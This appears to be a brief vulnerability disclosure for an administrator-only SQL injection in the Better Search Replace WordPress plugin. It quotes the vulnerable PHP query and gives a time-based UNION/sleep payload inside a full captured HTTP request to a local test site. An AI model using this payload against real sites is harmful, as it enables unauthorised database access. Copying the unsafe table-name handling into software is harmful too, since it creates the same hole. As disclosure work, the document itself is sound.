Administrator-only SQL Injection in Better Search Replace Plugin:latest
public function get_pages_in_table( $table ) {
$table = esc_sql( $table );
$rows = $this->wpdb->get_var( "SELECT COUNT(*) FROM `$table`" );
$pages = ceil( $rows / $this->page_size );
return absint( $pages );
}
Payload
wp_users`+UNION+SELECT+sleep(20)+--+-
POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax=process_search_replace HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/tools.php?page=better-search-replace&tab=bsr_search_replace&result=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 399
Origin: http://127.0.0.1
Connection: close
Cookie: wordpress_5c016e8f0f95f039102cbe8366c5c7f3=user%7C1655429684%7CWIK347wQFxIVQpFS6lXxPPxK3VdbQrcVT6S5xrwJqkh%7Ccfe15eb0faef947915090e54f1df4eb191b0c041f55fbb48029f24a0a11b6140; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=user%7C1655429684%7CWIK347wQFxIVQpFS6lXxPPxK3VdbQrcVT6S5xrwJqkh%7C287babf3cbf8e3c2e7e1a220125b9364a400a91776018a3ec7adcfeb4892054c; wp-settings-time-1=1655268462
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
bsr_ajax_nonce=cbacda051a&action=process_search_replace&bsr_step=0&bsr_page=0&bsr_data=search_for%3DA%26replace_with%3DA%26select_tables%255B%255D%3Dwp_users`+UNION+SELECT+sleep(20)+--+-%26dry_run%3Don%26bsr_nonce%3Da7229b6586%26_wp_http_referer%3D%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%2526tab%253Dbsr_search_replace%2526result%253Dtrue%26action%3Dbsr_process_search_replace
- Wait time is 2X the sleep time inserted